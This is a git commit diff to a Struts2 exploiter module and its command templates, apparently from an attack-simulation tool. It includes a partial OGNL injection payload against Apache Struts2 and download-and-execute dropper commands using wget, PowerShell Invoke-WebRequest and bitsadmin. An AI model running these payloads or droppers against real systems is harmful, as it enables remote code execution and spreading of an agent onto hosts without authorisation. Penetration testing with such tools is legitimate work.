forked from p15670423/monkey
Fixed some bugs and more notes
This commit is contained in:
parent
81712ddbf0
commit
671452243d
|
@ -12,7 +12,7 @@ import logging
|
||||||
from exploit import HostExploiter
|
from exploit import HostExploiter
|
||||||
from exploit.tools import get_target_monkey, get_monkey_depth
|
from exploit.tools import get_target_monkey, get_monkey_depth
|
||||||
from tools import build_monkey_commandline, HTTPTools
|
from tools import build_monkey_commandline, HTTPTools
|
||||||
from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, DROPPER_ARG
|
from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP_BITS_DROPPER
|
||||||
|
|
||||||
__author__ = "VakarisZ"
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
|
@ -20,9 +20,6 @@ LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300
|
DOWNLOAD_TIMEOUT = 300
|
||||||
|
|
||||||
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, )
|
|
||||||
|
|
||||||
|
|
||||||
class Struts2Exploiter(HostExploiter):
|
class Struts2Exploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
|
|
||||||
|
@ -47,7 +44,8 @@ class Struts2Exploiter(HostExploiter):
|
||||||
if port[1]:
|
if port[1]:
|
||||||
current_host = "https://%s:%s" % (self.host.ip_addr, port[0])
|
current_host = "https://%s:%s" % (self.host.ip_addr, port[0])
|
||||||
else:
|
else:
|
||||||
current_host = "http://%s:%s" % (self.host.ip_addr, port[0])
|
# TODO remove struts
|
||||||
|
current_host = "http://%s:%s/struts" % (self.host.ip_addr, port[0])
|
||||||
# Get full URL
|
# Get full URL
|
||||||
url = self.get_redirected(current_host)
|
url = self.get_redirected(current_host)
|
||||||
LOG.info("Trying to exploit with struts2")
|
LOG.info("Trying to exploit with struts2")
|
||||||
|
@ -87,7 +85,7 @@ class Struts2Exploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
LOG.info("Started http server on %s", http_path)
|
LOG.info("Started http server on %s", http_path)
|
||||||
|
|
||||||
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path)
|
||||||
|
|
||||||
command = WGET_HTTP % {'monkey_path': dropper_path,
|
command = WGET_HTTP % {'monkey_path': dropper_path,
|
||||||
'http_path': http_path, 'parameters': cmdline}
|
'http_path': http_path, 'parameters': cmdline}
|
||||||
|
@ -135,12 +133,13 @@ class Struts2Exploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
LOG.info("Started http server on %s", http_path)
|
LOG.info("Started http server on %s", http_path)
|
||||||
|
|
||||||
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
# We need to double escape backslashes. Once for payload, twice for command
|
||||||
|
cmdline = re.sub(r"\\", r"\\\\", build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path))
|
||||||
|
|
||||||
command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
|
command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
|
||||||
'http_path': http_path, 'parameters': cmdline}
|
'http_path': http_path, 'parameters': cmdline}
|
||||||
|
|
||||||
backup_command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
|
backup_command = RDP_CMDLINE_HTTP_BITS_DROPPER % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
|
||||||
'http_path': http_path, 'parameters': cmdline}
|
'http_path': http_path, 'parameters': cmdline}
|
||||||
|
|
||||||
resp = self.exploit(url, command)
|
resp = self.exploit(url, command)
|
||||||
|
@ -196,8 +195,6 @@ class Struts2Exploiter(HostExploiter):
|
||||||
:param cmd: Code to try and execute on host
|
:param cmd: Code to try and execute on host
|
||||||
:return: response
|
:return: response
|
||||||
"""
|
"""
|
||||||
page = ""
|
|
||||||
|
|
||||||
payload = "%%{(#_='multipart/form-data')." \
|
payload = "%%{(#_='multipart/form-data')." \
|
||||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
||||||
"(#_memberAccess?" \
|
"(#_memberAccess?" \
|
||||||
|
|
|
@ -19,8 +19,11 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
|
||||||
# Commands used for downloading monkeys
|
# Commands used for downloading monkeys
|
||||||
POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
|
POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
|
||||||
WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
|
WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
|
||||||
|
RDP_CMDLINE_HTTP_BITS_DROPPER = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, )
|
||||||
|
|
||||||
# Commands used to check for architecture and if machine is exploitable
|
# Commands used to check for architecture and if machine is exploitable
|
||||||
CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
|
CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
|
||||||
CHECK_LINUX = "echo %s && lscpu" % ID_STRING
|
CHECK_LINUX = "echo %s && lscpu" % ID_STRING
|
||||||
|
|
||||||
# Commands used to check if monkeys already exists
|
# Commands used to check if monkeys already exists
|
||||||
EXISTS = "ls %s"
|
EXISTS = "ls %s"
|
Loading…
Reference in New Issue